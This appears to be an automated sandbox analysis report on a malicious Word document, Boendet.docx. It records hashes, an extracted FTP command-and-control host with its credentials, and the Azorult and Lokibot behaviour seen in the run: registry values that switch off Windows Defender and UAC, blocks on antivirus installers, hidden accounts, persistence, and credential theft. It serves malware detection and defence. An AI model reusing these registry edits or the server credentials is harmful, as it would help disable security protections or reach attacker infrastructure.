Analysis
max time kernel: 1800s
max time network: 1802s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20-05-2024 08:02
Static task: static1
Behavioral task: behavioral1
Sample: Boendet.docx
Resource: win10v2004-20240426-en

General
Target: Boendet.docx
Size: 21.7MB
MD5: 14b980a65c7501e12ccfecd9bf55cb16
SHA1: 7bf794b9b674f5946eadb8e07a01d6aaeb337d7f
SHA256: a91345c766f145d47d6deb90c3ae9d920f28101e12e39d93e88e3612eaf07329
SHA512: a6758a6617f420ac3a49bbfbb055f43a2d5fbfa3611030e359d6ff788b7276f4c005a0e04c9cbc776dcf02e0ddc30b6bb55d1c8758b1822ad6e3cc612a54a504
SSDEEP: 393216:9/K/AmXAr22JMg1Ml30SRiGHVdrc5nw0DxTceN+ujRIT++9kkG:4/Ar2XRiSdrc5w0DxTb3RITBeN

Malware Config
Extracted
Protocol: ftp
Host: 109.248.203.81
Port: 21
Username: alex
Password: easypassword

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.

Processes: Azorult.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | Azorult.exe

Modifies visibility of hidden/system files in Explorer (2 TTPs, 1 IoC)
Processes: taskhostw.exe
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | taskhostw.exe

Processes: regedit.exe, Azorult.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Azorult.exe

Processes: regedit.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | regedit.exe

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.

Blocks application from running via registry modification (13 IoCs)
Adds application to list of disallowed applications.
Processes: Azorult.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | Azorult.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | Azorult.exe
Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | Azorult.exe

Downloads MZ/PE file

Drops file in Drivers directory (2 IoCs)
Processes: cmd.exe, Azorult.exe
description | ioc | process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | cmd.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Azorult.exe

Modifies Windows Firewall (2 TTPs, 23 IoCs)
Processes: netsh.exe
pid | process
4700 | netsh.exe
1176 | netsh.exe
372 | netsh.exe
3112 | netsh.exe
3128 | netsh.exe
3484 | netsh.exe
6620 | netsh.exe
2664 | netsh.exe
5848 | netsh.exe
1012 | netsh.exe
1176 | netsh.exe
3960 | netsh.exe
2180 | netsh.exe
5856 | netsh.exe
5356 | netsh.exe
4592 | netsh.exe
5676 | netsh.exe
2132 | netsh.exe
5544 | netsh.exe
2856 | netsh.exe
5544 | netsh.exe
1724 | netsh.exe
3952 | netsh.exe

Office macro that triggers on suspicious action (2 IoCs)
Office document macro which triggers in special circumstances - often malicious.
resource | yara_rule
C:\Users\Admin\Downloads\metrofax.doc | office_macro_on_action
C:\Users\Admin\AppData\Roaming\Microsoft\Word\AutoRecovery save of fygbf.asd | office_macro_on_action

Sets DLL path for service in the registry (2 TTPs, 1 IoC)
Processes: RDPWInst.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | RDPWInst.exe

Sets file to hidden (1 TTP, 3 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
Processes: attrib.exe
pid | process
6856 | attrib.exe
6872 | attrib.exe
6888 | attrib.exe

Checks computer location settings (2 TTPs, 16 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: firefox.exe, WScript.exe, taskhost.exe, Azorult.exe, tor-browser-windows-x86_64-portable-13.0.15.exe, wini.exe, winlogon.exe, winlog.exe, cmd.exe, cheat.exe, R8.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | firefox.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | firefox.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | taskhost.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | Azorult.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | tor-browser-windows-x86_64-portable-13.0.15.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | firefox.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | wini.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | winlogon.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | firefox.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | winlog.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | cheat.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | R8.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | WScript.exe

Executes dropped EXE (64 IoCs)
Processes: aurera+OTC+install.exe, aurera+OTC+install.tmp, aurera_dx.exe, aurera_dx-1716192337.exe, tor-browser-windows-x86_64-portable-13.0.15.exe, firefox.exe, tor.exe, lyrebird.exe, Lokibot.exe, Azorult.exe, wini.exe, winit.exe, rutserv.exe, rfusclient.exe
pid | process
2660 | aurera+OTC+install.exe
1768 | aurera+OTC+install.tmp
2812 | aurera_dx.exe
648 | aurera_dx.exe
4380 | aurera_dx-1716192337.exe
3864 | tor-browser-windows-x86_64-portable-13.0.15.exe
1184 | firefox.exe
1392 | firefox.exe
4116 | firefox.exe
1116 | firefox.exe
2472 | firefox.exe
1784 | tor.exe
3672 | firefox.exe
5044 | firefox.exe
1660 | firefox.exe
3860 | firefox.exe
1944 | firefox.exe
5500 | lyrebird.exe
3908 | firefox.exe
4184 | firefox.exe
5556 | firefox.exe
5204 | firefox.exe
5072 | firefox.exe
1824 | firefox.exe
6008 | firefox.exe
5428 | firefox.exe
5108 | firefox.exe
5644 | firefox.exe
3088 | firefox.exe
332 | firefox.exe
5996 | firefox.exe
5868 | firefox.exe
3492 | firefox.exe
2216 | firefox.exe
1744 | firefox.exe
6136 | firefox.exe
4132 | firefox.exe
2288 | firefox.exe
4688 | firefox.exe
5888 | firefox.exe
180 | tor.exe
5808 | firefox.exe
5584 | firefox.exe
5356 | firefox.exe
5332 | firefox.exe
2056 | firefox.exe
2968 | firefox.exe
856 | firefox.exe
2124 | firefox.exe
2716 | firefox.exe
5896 | firefox.exe
1140 | firefox.exe
1692 | firefox.exe
4276 | firefox.exe
5812 | firefox.exe
5884 | Lokibot.exe
1580 | Azorult.exe
3112 | wini.exe
5840 | winit.exe
3316 | rutserv.exe
5924 | rutserv.exe
4476 | rutserv.exe
1556 | rutserv.exe
5304 | rfusclient.exe

Loads dropped DLL (64 IoCs)
Processes: aurera_dx.exe, aurera_dx-1716192337.exe, tor-browser-windows-x86_64-portable-13.0.15.exe, firefox.exe
pid | process
2812 | aurera_dx.exe
2812 | aurera_dx.exe
2812 | aurera_dx.exe
648 | aurera_dx.exe
648 | aurera_dx.exe
4380 | aurera_dx-1716192337.exe
4380 | aurera_dx-1716192337.exe
4380 | aurera_dx-1716192337.exe
3864 | tor-browser-windows-x86_64-portable-13.0.15.exe
3864 | tor-browser-windows-x86_64-portable-13.0.15.exe
3864 | tor-browser-windows-x86_64-portable-13.0.15.exe
1184 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
1392 | firefox.exe
4116 | firefox.exe
4116 | firefox.exe
4116 | firefox.exe
4116 | firefox.exe
1116 | firefox.exe
1116 | firefox.exe
1116 | firefox.exe
1116 | firefox.exe
2472 | firefox.exe
2472 | firefox.exe
2472 | firefox.exe
2472 | firefox.exe
3672 | firefox.exe
3672 | firefox.exe
3672 | firefox.exe
3672 | firefox.exe
1116 | firefox.exe
2472 | firefox.exe
1116 | firefox.exe
2472 | firefox.exe
3672 | firefox.exe
3672 | firefox.exe
5044 | firefox.exe
5044 | firefox.exe
5044 | firefox.exe
5044 | firefox.exe
5044 | firefox.exe
5044 | firefox.exe
1660 | firefox.exe
1660 | firefox.exe
1660 | firefox.exe
1660 | firefox.exe
3860 | firefox.exe
3860 | firefox.exe
3860 | firefox.exe
3860 | firefox.exe
1944 | firefox.exe
1944 | firefox.exe
1944 | firefox.exe
1944 | firefox.exe
1660 | firefox.exe

Modifies file permissions (1 TTP, 62 IoCs)
Processes: icacls.exe
pid | process
1416 | icacls.exe
1028 | icacls.exe
2416 | icacls.exe
1820 | icacls.exe
5944 | icacls.exe
2528 | icacls.exe
2728 | icacls.exe
660 | icacls.exe
2012 | icacls.exe
2376 | icacls.exe
3340 | icacls.exe
4284 | icacls.exe
5388 | icacls.exe
1524 | icacls.exe
5852 | icacls.exe
5408 | icacls.exe
5880 | icacls.exe
2760 | icacls.exe
3792 | icacls.exe
352 | icacls.exe
5840 | icacls.exe
1848 | icacls.exe
2984 | icacls.exe
1104 | icacls.exe
1676 | icacls.exe
4220 | icacls.exe
5124 | icacls.exe
3268 | icacls.exe
2184 | icacls.exe
4200 | icacls.exe
5572 | icacls.exe
3776 | icacls.exe
3932 | icacls.exe
3840 | icacls.exe
2124 | icacls.exe
4884 | icacls.exe
3212 | icacls.exe
5292 | icacls.exe
3212 | icacls.exe
5132 | icacls.exe
3620 | icacls.exe
1264 | icacls.exe
628 | icacls.exe
5892 | icacls.exe
2980 | icacls.exe
5900 | icacls.exe
2400 | icacls.exe
3128 | icacls.exe
8 | icacls.exe
4448 | icacls.exe
3408 | icacls.exe
3408 | icacls.exe
5132 | icacls.exe
2600 | icacls.exe
5772 | icacls.exe
5560 | icacls.exe
5852 | icacls.exe
4368 | icacls.exe
2760 | icacls.exe
2984 | icacls.exe
4492 | icacls.exe
1196 | icacls.exe

Obfuscated with Agile.Net obfuscator (2 IoCs)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource | yara_rule
behavioral1/memory/5884-4855-0x0000000002CE0000-0x0000000002CF4000-memory.dmp | agile_net
behavioral1/memory/2416-5055-0x0000000000A90000-0x0000000000AA4000-memory.dmp | agile_net

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource | yara_rule
C:\ProgramData\Microsoft\Intel\winlogon.exe | upx
behavioral1/memory/2888-5116-0x0000000000400000-0x0000000000419000-memory.dmp | upx
behavioral1/memory/2888-5144-0x0000000000400000-0x0000000000419000-memory.dmp | upx
C:\Users\Admin\AppData\Local\Temp\aut1157.tmp | upx
behavioral1/memory/1572-5186-0x0000000000A30000-0x0000000000B1C000-memory.dmp | upx
behavioral1/memory/1572-5192-0x0000000000A30000-0x0000000000B1C000-memory.dmp | upx

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Processes: Lokibot.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | Lokibot.exe
Key opened | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | Lokibot.exe
Key opened | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | Lokibot.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes: taskhostw.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | taskhostw.exe

Blocklisted process makes network request (1 IoC)
Processes: msiexec.exe
flow | pid | process
671 | 4676 | msiexec.exe

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes: Azorult.exe, firefox.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Azorult.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | firefox.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | firefox.exe

Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: msiexec.exe
description | ioc | process
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 11 IoCs)
flow | ioc
545 | raw.githubusercontent.com
562 | raw.githubusercontent.com
759 | iplogger.org
769 | raw.githubusercontent.com
796 | camo.githubusercontent.com
109 | raw.githubusercontent.com
543 | raw.githubusercontent.com
754 | raw.githubusercontent.com
755 | raw.githubusercontent.com
758 | iplogger.org
785 | raw.githubusercontent.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
747 | ip-api.com

Modifies WinLogon (2 TTPs, 7 IoCs)
Processes: Azorult.exe, RDPWInst.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | RDPWInst.exe

AutoIT Executable (5 IoCs)
AutoIT scripts compiled to PE executables.
resource | yara_rule
C:\Users\Admin\Downloads\Azorult.exe | autoit_exe
C:\ProgramData\Windows\winit.exe | autoit_exe
C:\ProgramData\Microsoft\Intel\taskhost.exe | autoit_exe
behavioral1/memory/1572-5186-0x0000000000A30000-0x0000000000B1C000-memory.dmp | autoit_exe
behavioral1/memory/1572-5192-0x0000000000A30000-0x0000000000B1C000-memory.dmp | autoit_exe

Drops file in System32 directory (5 IoCs)
Processes: powershell.exe, RDPWInst.exe
description | ioc | process
File opened for modification | C:\Windows\System32\GroupPolicy | powershell.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | powershell.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | powershell.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | powershell.exe
File created | C:\Windows\System32\rfxvmt.dll | RDPWInst.exe

Suspicious use of SetThreadContext (2 IoCs)
Processes: Lokibot.exe
description | pid | process | target process
PID 5884 set thread context of 4684 | 5884 | Lokibot.exe | Lokibot.exe
PID 1044 set thread context of 6720 | 1044 | Lokibot.exe | Lokibot.exe

Drops file in Program Files directory (27 IoCs)
Processes: Azorult.exe, RDPWInst.exe, attrib.exe
description | ioc | process
File opened for modification | C:\Program Files\ByteFence | Azorult.exe
File opened for modification | C:\Program Files\SpyHunter | Azorult.exe
File opened for modification | C:\Program Files (x86)\Cezurity | Azorult.exe
File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | RDPWInst.exe
File opened for modification | C:\Program Files (x86)\Kaspersky Lab | Azorult.exe
File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | RDPWInst.exe
File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.dll | attrib.exe
File opened for modification | C:\Program Files (x86)\Zaxar | Azorult.exe
File opened for modification | C:\Program Files (x86)\SpyHunter | Azorult.exe
File opened for modification | C:\Program Files\COMODO | Azorult.exe
File opened for modification | C:\Program Files\Enigma Software Group | Azorult.exe
File created | C:\Program Files\Common Files\System\iediagcmd.exe | Azorult.exe
File opened for modification | C:\Program Files\AVAST Software | Azorult.exe
File opened for modification | C:\Program Files\AVG | Azorult.exe
File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | Azorult.exe
File opened for modification | C:\Program Files\ESET | Azorult.exe
File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | attrib.exe
File opened for modification | C:\Program Files (x86)\Microsoft JDX | Azorult.exe
File opened for modification | C:\Program Files (x86)\AVAST Software | Azorult.exe
File opened for modification | C:\Program Files (x86)\AVG | Azorult.exe
File opened for modification | C:\Program Files\Common Files\McAfee | Azorult.exe
File opened for modification | C:\Program Files\Malwarebytes | Azorult.exe
File opened for modification | C:\Program Files\RDP Wrapper | attrib.exe
File opened for modification | C:\Program Files (x86)\360 | Azorult.exe
File opened for modification | C:\Program Files\Kaspersky Lab | Azorult.exe
File opened for modification | C:\Program Files\Cezurity | Azorult.exe
File opened for modification | C:\Program Files (x86)\Panda Security | Azorult.exe

Drops file in Windows directory (1 IoC)
Processes: mspaint.exe
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | mspaint.exe

Launches sc.exe (24 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe
pid | process
6116 | sc.exe
1576 | sc.exe
4588 | sc.exe
5420 | sc.exe
5352 | sc.exe
1936 | sc.exe
3304 | sc.exe
2132 | sc.exe
4808 | sc.exe
5312 | sc.exe
4188 | sc.exe
2288 | sc.exe
5896 | sc.exe
3356 | sc.exe
5220 | sc.exe
3312 | sc.exe
5644 | sc.exe
5572 | sc.exe
1716 | sc.exe
1896 | sc.exe
644 | sc.exe
5408 | sc.exe
1312 | sc.exe
4856 | sc.exe

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes: taskmgr.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe

Checks processor information in registry (2 TTPs, 31 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: firefox.exe, AcroRd32.exe, WINWORD.EXE, aurera_dx-1716192337.exe, winit.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | aurera_dx-1716192337.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
